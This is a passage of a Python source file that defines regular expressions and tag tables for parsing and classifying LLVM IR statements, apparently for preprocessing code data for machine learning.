print("File signature: ", file_signature)
return file_signature
########################################################################################################################
# Regex manipulation: helper functions
########################################################################################################################
def any_of(possibilities, to_add=''):
"""
Helper function for regex manipulation:
Construct a regex representing "any of" the given possibilities
:param possibilities: list of strings representing different word possibilities
:param to_add: string to add at the beginning of each possibility (optional)
:return: string corresponding to regex which represents any of the given possibilities
"""
assert len(possibilities) > 0
s = '(?:'
if len(to_add) > 0:
s += possibilities[0] + to_add + ' '
else:
s += possibilities[0]
for i in range(len(possibilities) - 1):
if len(to_add) > 0:
s += '|' + possibilities[i + 1] + to_add + ' '
else:
s += '|' + possibilities[i + 1]
return s + ')'
########################################################################################################################
# Regex manipulation: helper variables
########################################################################################################################
# Identifiers
global_id = r'(?<!%")@["\w\d\.\-\_\$\\]+'
local_id_no_perc = '[\"\@\d\w\.\-\_\:]+'
local_id = '%' + local_id_no_perc
local_or_global_id = r'(' + global_id + r'|' + local_id + r')'
# Options and linkages
linkage = any_of([' private', ' external', ' internal', ' linkonce_odr', ' appending', ' external', ' internal',
' unnamed_addr', ' common', ' hidden', ' weak', ' linkonce', ' extern_weak', ' weak_odr', ' private',
' available_externally', ' local_unnamed_addr', ' thread_local', ' linker_private'])
# Immediate values
immediate_value_ad_hoc = r'#[\d\w]+'
immediate_value_true = r'true'
immediate_value_false = r'false'
immediate_value_bool = r'(?:' + immediate_value_true + r'|' + immediate_value_false + r')'
immediate_value_int = r'(?<!\w)[-]?[0-9]+'
immediate_value_float_sci = r'(?<!\w)[-]?[0-9]+\.[0-9]+(?:e\+?-?[0-9]+)?'
immediate_value_float_hexa = r'(?<!\w)[-]?0[xX][hklmHKLM]?[A-Fa-f0-9]+'
immediate_value_float = r'(?:' + immediate_value_float_sci + '|' + immediate_value_float_hexa + ')'
immediate_value_vector_bool = r'<i1 ' + immediate_value_bool + r'(?:, i1 (?:' + immediate_value_bool + '|undef))*>'
immediate_value_vector_int = r'<i\d+ ' + immediate_value_int + r'(?:, i\d+ (?:' + immediate_value_int + '|undef))*>'
immediate_value_vector_float = r'<float ' + immediate_value_float + r'(?:, float (?:' + immediate_value_float + \
'|undef))*>'
immediate_value_vector_double = r'<double ' + immediate_value_float + r'(?:, double (?:' + immediate_value_float + \
'|undef))*>'
immediate_value_string = r'(?<!\w)c".+"'
immediate_value_misc = r'(?:null|zeroinitializer)'
immediate_value = any_of([immediate_value_true, immediate_value_false,
immediate_value_int, immediate_value_float_sci, immediate_value_float_hexa,
immediate_value_string, immediate_value_misc])
immediate_value_undef = r'undef'
immediate_value_or_undef = any_of([immediate_value_true, immediate_value_false,
immediate_value_int, immediate_value_float_sci, immediate_value_float_hexa,
immediate_value_string,
immediate_value_misc, immediate_value_ad_hoc, immediate_value_undef])
# Combos
immediate_or_local_id = any_of([immediate_value_true, immediate_value_false,
immediate_value_int, immediate_value_float_sci, immediate_value_float_hexa,
immediate_value_vector_int, immediate_value_vector_float, immediate_value_vector_double,
local_id, immediate_value_misc])
immediate_or_local_id_or_undef = any_of([immediate_value_true, immediate_value_false,
immediate_value_int, immediate_value_float_sci, immediate_value_float_hexa,
immediate_value_vector_int, immediate_value_vector_float,
immediate_value_vector_double,
local_id, immediate_value_misc, immediate_value_undef])
# Names of aggregate types
# Lookahead so that names like '%struct.attribute_group**' won't be matched as just %struct.attribute
struct_lookahead = r'(?=[\s,\*\]\}])'
struct_name_add_on = '(?:\([\w\d=]+\)")?'
struct_name_without_lookahead = \
'%[\"\@\d\w\.\-\_:]+(?:(?:<[\"\@\d\w\.\-\_:,<>\(\) \*]+>|\([\"\@\d\w\.\-\_:,<> \*]+\)|\w+)?::[\" \@\d\w\.\-\_:\)\(]*)*' \
+ struct_name_add_on
struct_name = struct_name_without_lookahead + struct_lookahead
# Functions
func_name = r'@[\"\w\d\._\$\\]+'
func_call_pattern = r'.* @[\w\d\._]+'
func_call_pattern_or_bitcast = r'(.* @[\w\d\._]+|.*bitcast .* @[\w\d\._]+ to .*)'
# new basic block
start_basic_block = r'((?:<label>:)?(' + local_id_no_perc + r'):|; <label>:' + local_id_no_perc + r' )'
# Types
base_type = r'(?:i\d+|double|float|opaque)\**'
first_class_types = ['i\d+', 'half', 'float', 'double', 'fp_128', 'x86_fp80', 'ppc_fp128', '<%ID>']
first_class_type = any_of(first_class_types) + '\**'
base_type_or_struct_name = any_of([base_type, struct_name_without_lookahead])
ptr_to_base_type = base_type + r'\*+'
vector_type = r'<\d+ x ' + base_type + r'>'
ptr_to_vector_type = vector_type + r'\*+'
array_type = r'\[\d+ x ' + base_type + r'\]'
ptr_to_array_type = array_type + r'\*+'
array_of_array_type = '\[\d+ x ' + '\[\d+ x ' + base_type + '\]' + '\]'
struct = struct_name_without_lookahead
ptr_to_struct = struct + r'\*+'
function_type = base_type + ' \(' + any_of([base_type, vector_type, array_type, '...'], ',') + '*' + \
any_of([base_type, vector_type, array_type, '...']) + '\)\**'
any_type = any_of([base_type, ptr_to_base_type, vector_type, ptr_to_vector_type, array_type, ptr_to_array_type])
any_type_or_struct = any_of([base_type, ptr_to_base_type, vector_type, ptr_to_vector_type, array_type,
ptr_to_array_type, ptr_to_struct])
structure_entry = any_of([base_type, vector_type, array_type, array_of_array_type, function_type, r'{ .* }\**'])
structure_entry_with_comma = any_of([base_type, vector_type, array_type, array_of_array_type, function_type], ',')
literal_structure = '(<?{ ' + structure_entry_with_comma + '*' + structure_entry + ' }>?|{})'
# Tokens
unknown_token = '!UNK' # starts with '!' to guarantee it will appear first in the alphabetically sorted vocabulary
########################################################################################################################
# Tags for clustering statements (by statement semantics) and helper functions
########################################################################################################################
# List of families of operations
llvm_IR_stmt_families = [
# ["tag level 1", "tag level 2", "tag level 3", "regex" ]
["unknown token", "unknown token", "unknown token", '!UNK'],
["integer arithmetic", "addition", "add integers", "<%ID> = add .*"],
["integer arithmetic", "subtraction", "subtract integers", "<%ID> = sub .*"],
["integer arithmetic", "multiplication", "multiply integers", "<%ID> = mul .*"],
["integer arithmetic", "division", "unsigned integer division", "<%ID> = udiv .*"],
["integer arithmetic", "division", "signed integer division", "<%ID> = sdiv .*"],
["integer arithmetic", "remainder", "remainder of signed div", "<%ID> = srem .*"],
["integer arithmetic", "remainder", "remainder of unsigned div.", "<%ID> = urem .*"],
["floating-point arithmetic", "addition", "add floats", "<%ID> = fadd .*"],
["floating-point arithmetic", "subtraction", "subtract floats", "<%ID> = fsub .*"],
["floating-point arithmetic", "multiplication", "multiply floats", "<%ID> = fmul .*"],
["floating-point arithmetic", "division", "divide floats", "<%ID> = fdiv .*"],
["bitwise arithmetic", "and", "and", "<%ID> = and .*"],
["bitwise arithmetic", "or", "or", "<%ID> = or .*"],
["bitwise arithmetic", "xor", "xor", "<%ID> = xor .*"],
["bitwise arithmetic", "shift left", "shift left", "<%ID> = shl .*"],
["bitwise arithmetic", "arithmetic shift right", "ashr", "<%ID> = ashr .*"],
["bitwise arithmetic", "logical shift right", "logical shift right", "<%ID> = lshr .*"],
["comparison operation", "compare integers", "compare integers", "<%ID> = icmp .*"],
["comparison operation", "compare floats", "compare floats", "<%ID> = fcmp .*"],
["conversion operation", "bitcast", "bitcast single val",
'<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque) .* to .*'],
["conversion operation", "bitcast", "bitcast single val*",
'<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\* .* to .*'],
["conversion operation", "bitcast", "bitcast single val**",
'<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\*\* .* to .*'],
["conversion operation", "bitcast", "bitcast single val***",
'<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\*\*\* .* to .*'],
["conversion operation", "bitcast", "bitcast single val****",
'<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\*\*\*\* .* to .*'],
["conversion operation", "bitcast", "bitcast array", '<%ID> = bitcast \[\d.* to .*'],
["conversion operation", "bitcast", "bitcast vector", '<%ID> = bitcast <\d.* to .*'],
["conversion operation", "bitcast", "bitcast structure", '<%ID> = bitcast (%"|<{|<%|{).* to .*'],
["conversion operation", "bitcast", "bitcast void", '<%ID> = bitcast void '],
["conversion operation", "extension/truncation", "extend float", "<%ID> = fpext .*"],
["conversion operation", "extension/truncation", "truncate floats", "<%ID> = fptrunc .*"],
["conversion operation", "extension/truncation", "sign extend ints", "<%ID> = sext .*"],
["conversion operation", "extension/truncation", "truncate int to ... ", "<%ID> = trunc .* to .*"],
["conversion operation", "extension/truncation", "zero extend integers", "<%ID> = zext .*"],
["conversion operation", "convert", "convert signed integers to... ", "<%ID> = sitofp .*"],
["conversion operation", "convert", "convert unsigned integer to... ", "<%ID> = uitofp .*"],
["conversion operation", "convert int to ptr", "convert int to ptr", "<%ID> = inttoptr .*"],
["conversion operation", "convert ptr to int", "convert ptr to int", "<%ID> = ptrtoint .*"],
["conversion operation", "convert floats", "convert float to sint", "<%ID> = fptosi .*"],
["conversion operation", "convert floats", "convert float to uint", "<%ID> = fptoui .*"],
["control flow", "phi", "phi", "<%ID> = phi .*"],
["control flow", "switch", "jump table line", "i\d{1,2} <(INT|FLOAT)>, label <%ID>"],
["control flow", "select", "select", "<%ID> = select .*"],
["control flow", "invoke", "invoke and ret type", "<%ID> = invoke .*"],
["control flow", "invoke", "invoke void", "invoke (fastcc )?void .*"],
["control flow", "branch", "branch conditional", "br i1 .*"],
["control flow", "branch", "branch unconditional", "br label .*"],
["control flow", "branch", "branch indirect", "indirectbr .*"],
["control flow", "control flow", "switch", "switch .*"],
["control flow", "return", "return", "ret .*"],
["control flow", "resume", "resume", "resume .*"],
["control flow", "unreachable", "unreachable", "unreachable.*"],
["control flow", "exception handling", "catch block", "catch .*"],
["control flow", "exception handling", "cleanup clause", "cleanup"],
["control flow", "exception handling", "landingpad for exceptions", "<%ID> = landingpad ."],
["function", "function call", "sqrt (llvm-intrinsic)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>) @(llvm|llvm\..*)\.sqrt.*"],
["function", "function call", "fabs (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.fabs.*"],
["function", "function call", "max (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.max.*"],
["function", "function call", "min (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.min.*"],
["function", "function call", "fma (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.fma.*"],
["function", "function call", "phadd (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.phadd.*"],
["function", "function call", "pabs (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.pabs.*"],
["function", "function call", "pmulu (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.pmulu.*"],
["function", "function call", "umul (llvm-intr.)", "<%ID> = (tail |musttail |notail )?call {.*} @llvm\.umul.*"],
["function", "function call", "prefetch (llvm-intr.)", "(tail |musttail |notail )?call void @llvm\.prefetch.*"],
["function", "function call", "trap (llvm-intr.)", "(tail |musttail |notail )?call void @llvm\.trap.*"],
["function", "func decl / def", "function declaration", "declare .*"],
["function", "func decl / def", "function definition", "define .*"],
["function", "function call", "function call void",
"(tail |musttail |notail )?call( \w+)? void [\w\)\(\}\{\.\,\*\d\[\]\s<>%]*(<[@%]ID>\(|.*bitcast )"],
["function", "function call", "function call mem lifetime",
"(tail |musttail |notail )?call( \w+)? void ([\w)(\.\,\*\d ])*@llvm\.lifetime.*"],
["function", "function call", "function call mem copy",
"(tail |musttail |notail )?call( \w+)? void ([\w)(\.\,\*\d ])*@llvm\.memcpy\..*"],
["function", "function call", "function call mem set",
"(tail |musttail |notail )?call( \w+)? void ([\w)(\.\,\*\d ])*@llvm\.memset\..*"],
["function", "function call", "function call single val",
'<%ID> = (tail |musttail |notail )?call[^{]* (i\d+|float|double|x86_fp80|<\d+ x (i\d+|float|double)>) (.*<[@%]ID>\(|(\(.*\) )?bitcast ).*'],
["function", "function call", "function call single val*",
'<%ID> = (tail |musttail |notail )?call[^{]* (i\d+|float|double|x86_fp80)\* (.*<[@%]ID>\(|\(.*\) bitcast ).*'],
["function", "function call", "function call single val**",
'<%ID> = (tail |musttail |notail )?call[^{]* (i\d+|float|double|x86_fp80)\*\* (.*<[@%]ID>\(|\(.*\) bitcast ).*'],
["function", "function call", "function call array",
'<%ID> = (tail |musttail |notail )?call[^{]* \[.*\] (\(.*\) )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call array*",
'<%ID> = (tail |musttail |notail )?call[^{]* \[.*\]\* (\(.*\) )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call array**",
'<%ID> = (tail |musttail |notail )?call[^{]* \[.*\]\*\* (\(.*\) )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call structure",
'<%ID> = (tail |musttail |notail )?call[^{]* (\{ .* \}[\w\_]*|<?\{ .* \}>?|opaque|\{\}|<%ID>) (\(.*\)\*? )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call structure*",
'<%ID> = (tail |musttail |notail )?call[^{]* (\{ .* \}[\w\_]*|<?\{ .* \}>?|opaque|\{\}|<%ID>)\* (\(.*\)\*? )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call structure**",
'<%ID> = (tail |musttail |notail )?call[^{]* (\{ .* \}[\w\_]*|<?\{ .* \}>?|opaque|\{\}|<%ID>)\*\* (\(.*\)\*? )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call structure***",
'<%ID> = (tail |musttail |notail )?call[^{]* (\{ .* \}[\w\_]*|<?\{ .* \}>?|opaque|\{\}|<%ID>)\*\*\* (\(.*\)\*? )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call asm value", '<%ID> = (tail |musttail |notail )?call.* asm .*'],
["function", "function call", "function call asm void", '(tail |musttail |notail )?call void asm .*'],
["function", "function call", "function call function",
'<%ID> = (tail |musttail |notail )?call[^{]* void \([^\(\)]*\)\** <[@%]ID>\('],
["global variables", "glob. var. definition", "???", "<@ID> = (?!.*constant)(?!.*alias).*"],
["global variables", "constant definition", "???", "<@ID> = .*constant .*"],
["memory access", "load from memory", "load structure", '<%ID> = load (\w* )?(%"|<\{|\{ <|\{ \[|\{ |<%|opaque).*'],
["memory access", "load from memory", "load single val", '<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)[, ].*'],
["memory access", "load from memory", "load single val*",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*[, ].*'],
["memory access", "load from memory", "load single val**",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*\*[, ].*'],
["memory access", "load from memory", "load single val***",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*\*\*[, ].*'],
["memory access", "load from memory", "load single val****",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*\*\*\*[, ].*'],
["memory access", "load from memory", "load single val*****",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*\*\*\*\*[, ].*'],
["memory access", "load from memory", "load single val******",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*\*\*\*\*\*[, ].*'],
["memory access", "load from memory", "load single val*******",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*\*\*\*\*\*\*[, ].*'],
["memory access", "load from memory", "load vector", '<%ID> = load <\d+ x .*'],
["memory access", "load from memory", "load array", '<%ID> = load \[\d.*'],
["memory access", "load from memory", "load fction ptr", '<%ID> = load void \('],
["memory access", "store", "store", 'store.*'],
["memory addressing", "GEP", "GEP", "<%ID> = getelementptr .*"],
["memory allocation", "allocate on stack", "allocate structure", '<%ID> = alloca (%"|<{|<%|{ |opaque).*'],
["memory allocation", "allocate on stack", "allocate vector", "<%ID> = alloca <\d.*"],
["memory allocation", "allocate on stack", "allocate array", "<%ID> = alloca \[\d.*"],
["memory allocation", "allocate on stack", "allocate single value", "<%ID> = alloca (double|float|i\d{1,3})\*?.*"],
["memory allocation", "allocate on stack", "allocate void", "<%ID> = alloca void \(.*"],
["memory atomics", "atomic memory modify", "atomicrw xchg", "<%ID> = atomicrmw.* xchg .*"],
["memory atomics", "atomic memory modify", "atomicrw add", "<%ID> = atomicrmw.* add .*"],
["memory atomics", "atomic memory modify", "atomicrw sub", "<%ID> = atomicrmw.* sub .*"],
["memory atomics", "atomic memory modify", "atomicrw or", "<%ID> = atomicrmw.* or .*"],
["memory atomics", "atomic compare exchange", "cmpxchg single val",
"<%ID> = cmpxchg (weak )?(i\d+|float|double|x86_fp80)\*"],
["non-instruction", "label", "label declaration", "; <label>:.*(\s+; preds = <LABEL>)?"],
["non-instruction", "label", "label declaration", "<LABEL>:( ; preds = <LABEL>)?"],
["value aggregation", "extract value", "extract value", "<%ID> = extractvalue .*"],
["value aggregation", "insert value", "insert value", "<%ID> = insertvalue .*"],
["vector operation", "insert element", "insert element", "<%ID> = insertelement .*"],
["vector operation", "extract element", "extract element", "<%ID> = extractelement .*"],
["vector operation", "shuffle vector", "shuffle vector", "<%ID> = shufflevector .*"]
]
# Helper functions for exploring llvm_IR_families
def get_list_tag_level_1():
"""
Get the list of all level-1 tags in the data structure llvm_IR_families
:return: list containing strings corresponding to all level 1 tags
"""
list_tags = list()
for fam in llvm_IR_stmt_families:
list_tags.append(fam[0])
return list(set(list_tags))
def get_list_tag_level_2(tag_level_1='all'):
"""
Get the list of all level-2 tags in the data structure llvm_IR_families
corresponding to the string given as an input, or absolutely all of them
if input == 'all'
:param tag_level_1: string containing the level-1 tag to query, or 'all'
:return: list of strings
"""
# Make sure the input parameter is valid
assert tag_level_1 in get_list_tag_level_1() or tag_level_1 == 'all', tag_level_1 + ' invalid'
list_tags = list()
if tag_level_1 == 'all':
for fam in llvm_IR_stmt_families:
list_tags.append(fam[1])
list_tags = sorted(set(list_tags))
else:
for fam in llvm_IR_stmt_families:
if fam[0] == tag_level_1:
list_tags.append(fam[1])
return list(set(list_tags))
def get_list_tag_level_3(tag_level_2='all'):
"""
Get the list of all level-2 tags in the data structure llvm_IR_families
corresponding to the string given as an input, or absolutely all of them
if input == 'all'
:param tag_level_2: string containing the level-2 tag to query, or 'all'
:return: list of strings
"""
# Make sure the input parameter is valid
assert tag_level_2 in get_list_tag_level_2() or tag_level_2 == 'all'
list_tags = list()
if tag_level_2 == 'all':
for fam in llvm_IR_stmt_families:
list_tags.append(fam[2])
list_tags = sorted(set(list_tags))
else:
for fam in llvm_IR_stmt_families:
if fam[1] == tag_level_2:
list_tags.append(fam[2])
return list(set(list_tags))
def get_count(data, tag, level):
"""
Count the total number of occurrences of a given tag at a certain level
:param fams:
:param tag:
:param level:
:return:
"""
# Make sure the input is valid
assert level in [1, 2, 3]
# Count
count = 0
# Depending on tag level:
if level == 1:
assert tag in get_list_tag_level_1()
for fam in llvm_IR_stmt_families:
if fam[0] == tag:
# count += fam[3]
# count occurences in data
for key, value in data.items():
if re.match(fam[3], key):
count += value
elif level == 2:
assert tag in get_list_tag_level_2()
for fam in llvm_IR_stmt_families:
if fam[1] == tag:
# count += fam[3]
# count occurences in data
for key, value in data.items():
if re.match(fam[3], key):
count += value
elif level == 3:
assert tag in get_list_tag_level_3()
for fam in llvm_IR_stmt_families:
if fam[2] == tag:
# count += fam[3]
# count occurences in data
for key, value in data.items():
if re.match(fam[3], key):
count += value
return count
########################################################################################################################
# Tags for clustering statements (by statement type)
########################################################################################################################
# Helper lists
types_int = ['i1', 'i8', 'i16', 'i32', 'i64']
types_flpt = ['half', 'float', 'double', 'fp128', 'x86_fp80', 'ppc_fp128']
fast_math_flag = ['', 'nnan ', 'ninf ', 'nsz ', 'arcp ', 'contract ', 'afn ', 'reassoc ', 'fast ']
opt_load = ['atomic ', 'volatile ']
opt_addsubmul = ['nsw ', 'nuw ', 'nuw nsw ']
opt_usdiv = ['', 'exact ']
opt_icmp = ['eq ', 'ne ', 'ugt ', 'uge ', 'ult ', 'ule ', 'sgt ', 'sge ', 'slt ', 'sle ']
opt_fcmp = ['false ', 'oeq ', 'ogt ', 'oge ', 'olt ', 'olt ', 'ole ', 'one ', 'ord ', 'ueq ', 'ugt ',
'uge ', 'ult ', 'ule ', 'une ', 'uno ', 'true ']
opt_define = ['', 'linkonce_odr ', 'linkonce_odr ', 'zeroext ', 'dereferenceable\(\d+\) ', 'hidden ', 'internal ',
'nonnull ', 'weak_odr ', 'fastcc ', 'noalias ', 'signext ', 'spir_kernel ']
opt_invoke = ['', 'dereferenceable\(\d+\) ', 'noalias ', 'fast ', 'zeroext ', 'signext ', 'fastcc ']
opt_GEP = ['', 'inbounds ']
# Helper functions
def any_of(possibilities, to_add=''):
"""
Construct a regex representing "any of" the given possibilities
:param possibilities: list of strings representing different word possibilities
:param to_add: string to add at the beginning of each possibility (optional)
:return: string corresponding to regex which represents any of the given possibilities
"""
assert len(possibilities) > 0
s = '('
if len(to_add) > 0:
s += possibilities[0] + to_add + ' '
else:
s += possibilities[0]
for i in range(len(possibilities) - 1):
if len(to_add) > 0:
s += '|' + possibilities[i + 1] + to_add + ' '
else:
s += '|' + possibilities[i + 1]
return s + ')'
# Main tags
llvm_IR_stmt_tags = [
# ['regex' 'tag' 'tag general'
['<@ID> = (?!.*constant)(?!.*alias).*', 'global definition', 'global variable definition'],
['<@ID> = .*constant .*', 'global const. def.', 'global variable definition'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
